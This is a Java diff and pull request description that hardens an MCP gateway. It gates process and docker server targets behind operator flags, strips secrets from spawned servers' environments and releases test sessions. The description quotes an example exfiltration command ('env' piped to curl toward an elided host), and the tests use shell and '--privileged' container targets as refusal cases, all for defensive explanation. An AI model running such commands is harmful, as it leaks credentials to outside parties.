 import org.junit.jupiter.api.Test;
@@ -95,6 +98,20 @@ class McpGatewayAutoConfigurationTest {
                 assertThat(context).doesNotHaveBean(ai.mindconnect.mcp.gateway.McpCatalog.class));
         runner().withPropertyValues("mindconnect.mcp.catalog.enabled=true").run(context ->
                 assertThat(context).hasSingleBean(ai.mindconnect.mcp.gateway.McpCatalog.class));
+    }
+
+    @Test
+    void with_sign_in_on_a_process_target_does_not_start() {
+        // /mcp-gateway asks for a login, not an admin role: without this,
+        // anybody who can sign in runs a command on the server with a probe.
+        runner().withPropertyValues("mindconnect.auth.enabled=true").run(context -> {
+            McpProbeResult probe = context.getBean(McpRegistryAdmin.class).probe(new McpServerRegistration(
+                    McpServerId.of("shell"), null, null, true, "shell",
+                    new McpTarget.Process(List.of("/bin/sh", "-c", "env"), Map.of()), null));
+
+            assertThat(probe.ok()).isFalse();
+            assertThat(probe.message()).contains("process targets are switched off");
+        });
     }
 
     @Configuration(proxyBeanMethods = false)

--- a/agents/mcp/mc-mcp-gateway-local/src/test/java/ai/mindconnect/mcp/gateway/local/McpStartPolicyTest.java
+++ b/agents/mcp/mc-mcp-gateway-local/src/test/java/ai/mindconnect/mcp/gateway/local/McpStartPolicyTest.java
@@ -1,0 +1,48 @@
+package ai.mindconnect.mcp.gateway.local;
+
+import org.junit.jupiter.api.Test;
+import org.springframework.core.env.AbstractEnvironment;
+import org.springframework.core.env.Environment;
+import org.springframework.core.env.MapPropertySource;
+
+import java.util.Map;
+
+import static org.assertj.core.api.Assertions.assertThat;
+
+class McpStartPolicyTest {
+
+    @Test
+    void without_sign_in_both_kinds_of_server_start() {
+        assertThat(McpStartPolicy.from(environment(Map.of())))
+                .isEqualTo(new McpStartPolicy(true, true));
+        assertThat(McpStartPolicy.from(environment(Map.of("mindconnect.auth.enabled", "false"))))
+                .isEqualTo(new McpStartPolicy(true, true));
+    }
+
+    @Test
+    void with_sign_in_neither_starts_until_an_operator_allows_it() {
+        // Registering asks for a login, not an admin role: with sign-in on,
+        // "may start a process" would otherwise mean "has an account".
+        assertThat(McpStartPolicy.from(environment(Map.of("mindconnect.auth.enabled", "true"))))
+                .isEqualTo(new McpStartPolicy(false, false));
+        assertThat(McpStartPolicy.from(environment(Map.of(
+                "mindconnect.auth.enabled", "true", "mindconnect.mcp.allow-process", "true"))))
+                .isEqualTo(new McpStartPolicy(true, false));
+        assertThat(McpStartPolicy.from(environment(Map.of(
+                "mindconnect.auth.enabled", "true", "mindconnect.mcp.allow-docker", "true"))))
+                .isEqualTo(new McpStartPolicy(false, true));
+    }
+
+    @Test
+    void an_explicit_no_holds_without_sign_in_too() {
+        assertThat(McpStartPolicy.from(environment(Map.of("mindconnect.mcp.allow-process", "false"))))
+                .isEqualTo(new McpStartPolicy(false, true));
+    }
+
+    /** Only the given properties — not the environment of whoever runs the test. */
+    private static Environment environment(Map<String, Object> properties) {
+        AbstractEnvironment environment = new AbstractEnvironment() { };
+        environment.getPropertySources().addFirst(new MapPropertySource("test", properties));
+        return environment;
+    }
+}

--- a/agents/mcp/mc-mcp-gateway-local/src/test/java/ai/mindconnect/mcp/gateway/local/McpTargetEndpointsTest.java
+++ b/agents/mcp/mc-mcp-gateway-local/src/test/java/ai/mindconnect/mcp/gateway/local/McpTargetEndpointsTest.java
@@ -20,7 +20,7 @@ class McpTargetEndpointsTest {
     @TempDir
     Path existingHostDir;
 
-    private final McpTargetEndpoints endpoints = new McpTargetEndpoints("podman");
+    private final McpTargetEndpoints endpoints = new McpTargetEndpoints("podman", McpStartPolicy.allowAll());
 
     /** A variable that no environment sets, so the tests do not depend on one. */
     private static final String UNSET = "MC_TEST_VARIABLE_THAT_IS_NEVER_SET";
@@ -128,7 +128,7 @@ class McpTargetEndpointsTest {
 
     @Test
     void without_a_container_runtime_a_docker_target_says_so() {
-        McpTargetEndpoints none = new McpTargetEndpoints(null);
+        McpTargetEndpoints none = new McpTargetEndpoints(null, McpStartPolicy.allowAll());
 
         assertThatThrownBy(() -> none.toEndpoint(
                 new McpTarget.Docker("mcp/gmail:latest", List.of(), Map.of(), List.of(), List.of())))
@@ -172,9 +172,45 @@ class McpTargetEndpointsTest {
     @Test
     void an_http_target_without_a_runtime_still_works() {
         // The container binary is irrelevant for a server we do not start.
-        McpTargetEndpoints none = new McpTargetEndpoints(null);
+        McpTargetEndpoints none = new McpTargetEndpoints(null, McpStartPolicy.allowAll());
 
         assertThat(none.toEndpoint(new McpTarget.Http(URI.create("https://mcp.example.com/mcp"), Map.of())))
+                .isInstanceOf(McpHttpEndpoint.class);
+    }
+
+    @Test
+    void a_process_target_is_refused_where_the_installation_starts_no_processes() {
+        McpTargetEndpoints noProcesses = new McpTargetEndpoints("podman", new McpStartPolicy(false, true));
+
+        assertThatThrownBy(() -> noProcesses.toEndpoint(new McpTarget.Process(
+                List.of("/bin/sh", "-c", "env"), Map.of())))
+                .isInstanceOf(McpGatewayException.class)
+                .hasMessageContaining("process targets are switched off")
+                .hasMessageContaining("mindconnect.mcp.allow-process");
+        assertThat(noProcesses.toEndpoint(new McpTarget.Docker(
+                "mcp/github", List.of(), Map.of(), List.of(), List.of())))
+                .as("containers are a separate decision")
+                .isInstanceOf(McpStdioSpawn.class);
+    }
+
+    @Test
+    void a_docker_target_is_refused_where_the_installation_starts_no_containers() {
+        // Refused before the runtime is even looked at: "switched off" is the
+        // answer an operator can act on, "no container runtime" would not be.
+        McpTargetEndpoints noContainers = new McpTargetEndpoints(null, new McpStartPolicy(true, false));
+
+        assertThatThrownBy(() -> noContainers.toEndpoint(new McpTarget.Docker(
+                "alpine:3", List.of(), Map.of(), List.of("--privileged"), List.of())))
+                .isInstanceOf(McpGatewayException.class)
+                .hasMessageContaining("docker targets are switched off")
+                .hasMessageContaining("mindconnect.mcp.allow-docker");
+    }
+
+    @Test
+    void an_http_target_starts_nothing_here_and_needs_no_permission() {
+        McpTargetEndpoints nothingStarts = new McpTargetEndpoints(null, new McpStartPolicy(false, false));
+
+        assertThat(nothingStarts.toEndpoint(new McpTarget.Http(URI.create("https://mcp.example.com/mcp"), Map.of())))
                 .isInstanceOf(McpHttpEndpoint.class);
     }
 

--- a/agents/mcp/mc-mcp-proxy/src/main/java/ai/mindconnect/mcp/proxy/InheritedEnvironment.java
+++ b/agents/mcp/mc-mcp-proxy/src/main/java/ai/mindconnect/mcp/proxy/InheritedEnvironment.java
@@ -1,0 +1,51 @@
+package ai.mindconnect.mcp.proxy;
+
+import java.util.Locale;
+import java.util.Map;
+import java.util.Set;
+
+/**
+ * What a started MCP server inherits from the environment of this process:
+ * what a command needs to run and to reach the network, and nothing else.
+ *
+ * <p>A child process inherits every variable of its parent unless told
+ * otherwise. The parent here holds the database password, LLM keys and the
+ * encryption secret; an MCP server is somebody else's code, registered through
+ * a screen that asks for a login, and has no business seeing any of it. What a
+ * server does need arrives through its registration's own {@code env}, which
+ * is added after this.
+ *
+ * <p>Kept: finding the command, a home and a temp directory, locale and time
+ * zone, proxies, and what the docker and podman CLIs read to find their
+ * daemon. Names are compared ignoring case, because Windows spells {@code Path}
+ * and {@code SystemRoot} as it pleases.
+ */
+final class InheritedEnvironment {
+
+    private static final Set<String> KEPT = Set.of(
+            // running a command at all
+            "PATH", "HOME", "USER", "LOGNAME", "SHELL", "LANG", "TZ", "TMPDIR", "TMP", "TEMP",
+            // Windows: without these a node or python process does not start
+            "SYSTEMROOT", "WINDIR", "COMSPEC", "PATHEXT", "USERPROFILE", "APPDATA", "LOCALAPPDATA",
+            "PROGRAMDATA", "PROGRAMFILES", "PROGRAMFILES(X86)",
+            // reaching the network from behind a proxy
+            "HTTP_PROXY", "HTTPS_PROXY", "NO_PROXY", "ALL_PROXY",
+            // where a user's tools keep their state
+            "XDG_RUNTIME_DIR", "XDG_CONFIG_HOME", "XDG_CACHE_HOME", "XDG_DATA_HOME",
+            // finding the container daemon
+            "DOCKER_HOST", "DOCKER_CONTEXT", "DOCKER_CONFIG", "DOCKER_CERT_PATH", "DOCKER_TLS_VERIFY",
+            "CONTAINER_HOST", "CONTAINER_SSHKEY", "CONTAINERS_CONF", "CONTAINERS_STORAGE_CONF");
+
+    private InheritedEnvironment() {
+    }
+
+    /** Removes every variable a started server does not inherit. */
+    static void trim(Map<String, String> environment) {
+        environment.keySet().removeIf(name -> !kept(name));
+    }
+
+    static boolean kept(String name) {
+        String upper = name.toUpperCase(Locale.ROOT);
+        return KEPT.contains(upper) || upper.startsWith("LC_");
+    }
+}

--- a/agents/mcp/mc-mcp-proxy/src/main/java/ai/mindconnect/mcp/proxy/SdkMcpProxy.java
+++ b/agents/mcp/mc-mcp-proxy/src/main/java/ai/mindconnect/mcp/proxy/SdkMcpProxy.java
@@ -88,7 +88,9 @@ public final class SdkMcpProxy implements McpProxy {
                 .env(spawn.env())
                 .build();
 
-        StdioClientTransport transport = new StdioClientTransport(params, jsonMapper);
+        // Started with a trimmed environment: the variables this process was
+        // started with — database password, LLM keys — are not the server's.
+        StdioClientTransport transport = new TrimmedStdioClientTransport(params, jsonMapper);
         transport.setStdErrorHandler(line ->
                 log.warn("[mcp:{}] {}", spawn.command(), line));
 
@@ -146,6 +148,25 @@ public final class SdkMcpProxy implements McpProxy {
                     "MCP initialize failed for " + what + ": " + e.getMessage(), e);
         }
         return new SdkMcpConnection(client, jsonMapper);
+    }
+
+    /**
+     * The SDK's stdio transport, starting its process with the trimmed
+     * environment of {@link InheritedEnvironment}. The SDK adds the
+     * registration's own variables after this, so those still arrive.
+     */
+    static final class TrimmedStdioClientTransport extends StdioClientTransport {
+
+        TrimmedStdioClientTransport(ServerParameters params, McpJsonMapper jsonMapper) {
+            super(params, jsonMapper);
+        }
+
+        @Override
+        protected ProcessBuilder getProcessBuilder() {
+            ProcessBuilder builder = new ProcessBuilder();
+            InheritedEnvironment.trim(builder.environment());
+            return builder;
+        }
     }
 
     /**

--- a/agents/mcp/mc-mcp-proxy/src/test/java/ai/mindconnect/mcp/proxy/InheritedEnvironmentTest.java
+++ b/agents/mcp/mc-mcp-proxy/src/test/java/ai/mindconnect/mcp/proxy/InheritedEnvironmentTest.java
@@ -1,0 +1,56 @@
+package ai.mindconnect.mcp.proxy;
+
+import io.modelcontextprotocol.client.transport.ServerParameters;
+import io.modelcontextprotocol.json.jackson3.JacksonMcpJsonMapperSupplier;
+import org.junit.jupiter.api.Test;
+
+import java.util.HashMap;
+import java.util.Map;
+
+import static org.assertj.core.api.Assertions.assertThat;
+
+/**
+ * A started MCP server is somebody else's code. It gets what a command needs
+ * to run, and not the secrets this process was started with.
+ */
+class InheritedEnvironmentTest {
+
+    @Test
+    void the_secrets_of_this_process_stay_behind() {
+        Map<String, String> environment = new HashMap<>(Map.of(
+                "PATH", "/usr/bin",
+                "HOME", "/home/mc",
+                "MC_POSTGRES_PASSWORD", "s3cret",
+                "MINDCONNECT_ENCRYPTION_SECRET_KEY", "0123456789abcdef",
+                "OPENAI_API_KEY", "sk-test",
+                "LC_ALL", "de_CH.UTF-8",
+                "https_proxy", "http://proxy:3128",
+                "DOCKER_HOST", "unix:///run/podman/podman.sock"));
+
+        InheritedEnvironment.trim(environment);
+
+        assertThat(environment).containsOnlyKeys("PATH", "HOME", "LC_ALL", "https_proxy", "DOCKER_HOST");
+    }
+
+    @Test
+    void windows_spellings_count_as_the_same_name() {
+        assertThat(InheritedEnvironment.kept("Path")).isTrue();
+        assertThat(InheritedEnvironment.kept("SystemRoot")).isTrue();
+        assertThat(InheritedEnvironment.kept("ProgramFiles(x86)")).isTrue();
+        assertThat(InheritedEnvironment.kept("Tavily_Api_Key")).isFalse();
+    }
+
+    @Test
+    void the_stdio_transport_starts_its_process_with_the_trimmed_environment() {
+        // On the map the JDK hands out, not a copy: that is the one the process
+        // starts with, and removing from it has to work.
+        ProcessBuilder builder = new SdkMcpProxy.TrimmedStdioClientTransport(
+                ServerParameters.builder("sh").build(), new JacksonMcpJsonMapperSupplier().get())
+                .getProcessBuilder();
+
+        assertThat(builder.environment().keySet()).allMatch(InheritedEnvironment::kept);
+        if (System.getenv("PATH") != null) {
+            assertThat(builder.environment()).containsKey("PATH");
+        }
+    }
+}

--- a/agents/server/mc-agent-admin-ui-app/src/main/resources/application.yaml
+++ b/agents/server/mc-agent-admin-ui-app/src/main/resources/application.yaml
@@ -53,6 +53,13 @@ mindconnect:
   tools:
     tavily-api-key: ${TAVILY_API_KEY:}
   mcp:
+    # MCP servers this installation starts itself. A "process" target runs a
+    # command, a "docker" target a container — both with the rights of this
+    # server, and /mcp-gateway asks for a login, not an admin role. Unset,
+    # each follows sign-in: on while auth.enabled is false, off once it is
+    # true. Set explicitly with MINDCONNECT_MCP_ALLOW_PROCESS / _ALLOW_DOCKER.
+    # allow-process: false
+    # allow-docker: false
     # Suggestions for registering MCP servers, fetched from Docker's public
     # catalog. Off by default: it is an outbound call to a third party, and
     # an installation that does not want one should not make it because

--- a/agents/server/mc-agent-admin-ui-rest/src/main/java/ai/mindconnect/adminui/service/ToolTestService.java
+++ b/agents/server/mc-agent-admin-ui-rest/src/main/java/ai/mindconnect/adminui/service/ToolTestService.java
@@ -25,7 +25,9 @@ import java.util.Map;
  * (todo_write, workspace_write, …) therefore write into an isolated
  * scratch session that's never reused — no risk of polluting a real
  * conversation. The session directory is left on disk for inspection;
- * the admin can clean it up later if it accumulates.
+ * the admin can clean it up later if it accumulates. What a tool holds for
+ * the session in memory — an MCP server's pooled connection and the
+ * container behind it — is released as soon as the test is over.
  */
 @Service
 public class ToolTestService {
@@ -65,7 +67,8 @@ public class ToolTestService {
                     System.currentTimeMillis() - t0);
         }
 
-        var resolved = toolRegistry.resolve(agentTool, new ToolCallScope(UserId.of(TEST_USER_ID), SessionId.random(), null));
+        SessionId session = SessionId.random();
+        var resolved = toolRegistry.resolve(agentTool, new ToolCallScope(UserId.of(TEST_USER_ID), session, null));
         if (resolved.isEmpty()) {
             return Result.error("Tool '" + agentTool.name()
                     + "' could not be resolved (missing factory or unavailable)?",
@@ -84,6 +87,11 @@ public class ToolTestService {
             log.warn("Tool test '{}' failed after {} ms: {}",
                     agentTool.name(), durMs, e.getMessage());
             return Result.error(e.getClass().getSimpleName() + ": " + e.getMessage(), durMs);
+        } finally {
+            // Nobody comes back to this session. What a tool holds for it — an
+            // MCP server's pooled connection, the container behind it — would
+            // otherwise stay until an idle timeout, once per click.
+            toolRegistry.releaseSession(session);
         }
     }
 

--- a/agents/server/mc-agent-admin-ui-rest/src/test/java/ai/mindconnect/adminui/service/ToolTestServiceTest.java
+++ b/agents/server/mc-agent-admin-ui-rest/src/test/java/ai/mindconnect/adminui/service/ToolTestServiceTest.java
@@ -1,0 +1,74 @@
+package ai.mindconnect.adminui.service;
+
+import ai.mindconnect.agent.SessionId;
+import ai.mindconnect.agent.tool.AgentTool;
+import ai.mindconnect.agent.tool.Tool;
+import ai.mindconnect.agent.tool.ToolCallScope;
+import ai.mindconnect.agent.tool.ToolRegistry;
+import org.junit.jupiter.api.Test;
+
+import java.util.ArrayList;
+import java.util.List;
+import java.util.Map;
+import java.util.Optional;
+import java.util.function.Function;
+
+import static org.assertj.core.api.Assertions.assertThat;
+
+/**
+ * Every test runs in a session of its own. What a tool holds for that session
+ * — an MCP server's pooled connection, the container behind it — has to go
+ * when the test is over, or every click leaves one behind.
+ */
+class ToolTestServiceTest {
+
+    @Test
+    void the_test_session_is_released_after_the_call() {
+        RecordingRegistry registry = new RecordingRegistry(arguments -> "ran");
+
+        ToolTestService.Result result = new ToolTestService(registry).test(AgentTool.of("mcp_tool"), "{}");
+
+        assertThat(result.ok()).isTrue();
+        assertThat(registry.released).containsExactly(registry.resolvedIn.sessionId());
+    }
+
+    @Test
+    void a_tool_that_throws_still_has_its_session_released() {
+        RecordingRegistry registry = new RecordingRegistry(arguments -> {
+            throw new IllegalStateException("container did not start");
+        });
+
+        ToolTestService.Result result = new ToolTestService(registry).test(AgentTool.of("mcp_tool"), "{}");
+
+        assertThat(result.ok()).isFalse();
+        assertThat(registry.released).containsExactly(registry.resolvedIn.sessionId());
+    }
+
+    /** Hands out one tool that behaves as told, and records the sessions. */
+    private static final class RecordingRegistry implements ToolRegistry {
+
+        private final Function<Map<String, Object>, String> behaviour;
+        ToolCallScope resolvedIn;
+        final List<SessionId> released = new ArrayList<>();
+
+        RecordingRegistry(Function<Map<String, Object>, String> behaviour) {
+            this.behaviour = behaviour;
+        }
+
+        @Override
+        public Optional<Tool> resolve(AgentTool agentTool, ToolCallScope scope) {
+            resolvedIn = scope;
+            return Optional.of(new Tool() {
+                @Override public String name() { return agentTool.name(); }
+                @Override public String description() { return "a test tool"; }
+                @Override public Map<String, Object> parametersSchema() { return Map.of("type", "object"); }
+                @Override public String execute(Map<String, Object> arguments) { return behaviour.apply(arguments); }
+            });
+        }
+
+        @Override
+        public void releaseSession(SessionId sessionId) {
+            released.add(sessionId);
+        }
+    }
+}

--- a/website/docs/agents/built-in-tools.md
+++ b/website/docs/agents/built-in-tools.md
@@ -146,6 +146,13 @@ with prefix `gmail` turns its `search_emails` into `gmail_search_emails`.
   is stored in the registration and sent as it is. `${NAME}` is reserved for
   variables of the signed-in user; until users can set them, a registration that
   uses one does not start. The environment of the server process is never read.
+- **Starting a server here is the installation's decision.** `process` and `docker`
+  targets run with the rights of the admin UI, and registering asks for a login, not an
+  admin role. They start only where `mindconnect.mcp.allow-process` /
+  `mindconnect.mcp.allow-docker` allow it; unset, both follow sign-in — on while
+  `mindconnect.auth.enabled` is false, off once it is true. `http` needs neither. A
+  started server inherits only `PATH`, `HOME`, locale, proxy and container-daemon
+  variables; anything else it needs goes into its registration's `env`.
 - **The prefix is fixed** once a server is registered: agents bind the tool names it
   produces. Register a new server to use a different one.
 - **Storage:** one JSON file per server under


### PR DESCRIPTION
## Summary

Four findings from a review of the MCP modules (#64, #68). Findings 5–9 of that review follow in a separate branch.

1. **Any signed-in user could run commands on the server.** `/mcp-gateway` asks for a login, not an admin role (`SecurityConfig`: `anyRequest().authenticated()`, every user gets `ROLE_USER`), and *Test connection* starts the server at once. A `process` target like `["sh","-c","env | curl -d @- https://…"]` ran with the rights of the admin UI — and the SDK's `StdioClientTransport` started it with the JVM's whole environment, so it reopened the leak #68 closed for headers. A `docker` target with `--privileged` or a mount of `/` is the same.
   - **Flags:** `process` and `docker` targets start only where `mindconnect.mcp.allow-process` / `mindconnect.mcp.allow-docker` allow it (`McpStartPolicy`), enforced in `McpTargetEndpoints` — probe, discovery and call alike, refused before anything starts. Unset, both follow sign-in: on while `mindconnect.auth.enabled` is false (single user at the keyboard), off once it is true. `http` needs neither.
   - **Environment:** a started server inherits only `PATH`, `HOME`, locale, proxy and container-daemon variables (`InheritedEnvironment`, via `getProcessBuilder()` of the SDK transport); its registration's `env` is added on top.
   - The admin role itself needs a role model the admin UI does not have yet (concept 21 §9.2, AccessGuard) — noted as a TODO. Still open until then: data exfiltration through `http` registrations, and stored header values visible to every signed-in user.
2. **"Re-read tools" never reached the agents.** `LocalMcpGateway.catalogVersion()` was the repository's version alone; `forget()` moved nothing, so `McpMultiToolProvider` kept its cached names. A server that was down at the first lookup stayed toolless until a registration file changed or the app restarted. `forget()` now moves a generation that `catalogVersion()` includes — moved last, so a concurrent rebuild cannot file old tools under the new version.
3. **MCP failures did not count as failures.** `McpToolAdapter` answered "Tool execution failed: …" / "Error from MCP server: …", but `ToolCallWorker`, `ToolCallHistory` and the workflow `ToolCallStep` read a failure by `startsWith("Error:")`. A failed call showed as successful in the chat, and a workflow started from the admin or REST API — which has no session — ran its MCP step into "no session" and carried on with that text as the step's result. Every failure now starts with `Error:`.
4. **The tool test bench leaked a connection per click.** `ToolTestService` used `SessionId.random()` per test and nothing released it (`McpGateway.release` had no caller), so every test of a docker/process MCP tool left a container or process for the 30-minute idle sweep. New `ToolRegistry.releaseSession(sessionId)` / `MultiToolProvider.releaseSession(sessionId)` (default no-ops; `SpiToolRegistry` forwards to every provider, `OverlayToolRegistry` to its delegate); the test bench calls it in `finally`, and the MCP provider hands it to the gateway.

Docs: form hint, `application.yaml` comment, `website/docs/agents/built-in-tools.md`, the unreleased changelog entries, `McpGateway.release` Javadoc. New manual test `mcp/starting-servers-needs-permission`.

## Verification

- New and changed tests: `McpStartPolicyTest` (defaults with and without sign-in, explicit overrides), `McpTargetEndpointsTest` (+3: process/docker refused before the runtime is looked at, http needs no permission), `McpGatewayAutoConfigurationTest` (+1: with sign-in on a process probe is refused), `InheritedEnvironmentTest` (secrets stay behind; the transport's own `ProcessBuilder` map is trimmed), `LocalMcpGatewayForgetTest` (+1: `forget` moves the catalog version without a registration change), `McpMultiToolProviderTest` (`Error:` prefix, release reaches the gateway), `SpiToolRegistryReleaseTest`, `OverlayToolRegistryTest` (+1), `ToolTestServiceTest` (session released after success and after a throwing tool).
- `mc-agent-tool-spi`, `mc-mcp-gateway-core`, `mc-mcp-proxy`, `mc-mcp-gateway-local`, `mc-agent-tools-mcp`, `mc-mcp-gateway-admin-ui-rest`, `mc-agent-admin-ui-rest`: 182 tests green.
- Live on a local admin UI (auth off, `mc.env` loaded):
  - with `MINDCONNECT_MCP_ALLOW_PROCESS=false MINDCONNECT_MCP_ALLOW_DOCKER=false`: start log says both switched off; probing a process and a `--privileged` docker target is refused in ≤1 ms, no `[mcp:` log line, no container; an http probe to DeepWiki connects with 3 tools.
  - without the flags: the process target starts (and fails the handshake, as `cat` speaks no MCP); its `env` output shows only `HOME LOGNAME MINE PATH PWD SHELL SHLVL TMPDIR USER _` — none of the `mc.env` keys and not a `MC_TEST_SECRET` set for the admin UI.
- Not verified live: "Re-read tools" reaching an agent, and the release after a tool test (unit tests only).

🤖 Generated with [Claude Code](https://claude.com/claude-code)
